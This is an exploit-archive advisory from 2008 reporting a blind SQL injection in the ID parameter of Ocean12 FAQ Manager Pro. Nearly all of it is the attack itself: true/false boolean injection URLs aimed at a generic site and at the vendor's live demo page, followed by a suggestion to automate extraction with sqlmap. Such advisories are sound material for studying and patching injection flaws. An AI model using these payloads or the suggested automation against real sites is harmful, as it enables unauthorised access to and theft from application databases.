[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ocean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity
# Published : 2008-11-28
# Author : Stack
# Previous Title : ReVou Twitter Clone (Auth Bypass) SQL Injection Vulnerability
# Next Title : TxtBlog (index.php m) Local File Inclusion Vulnerability
#########################################################
---------------------------------------------------------
Portal Name: Ocean12 FAQ Manager Pro
Author : Mountassif Moad
Evil Finger / v4 Team
Vulnerability : Blind Sql Injection
---------------------------------------------------------
#########################################################
Exploit :
site.com/?Action=Cat&ID=40%20and%201=1 true
site.com/?Action=Cat&ID=40%20and%201=0 false
Demo :
http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true
http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false
# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
# www.Syue.com [2008-11-28]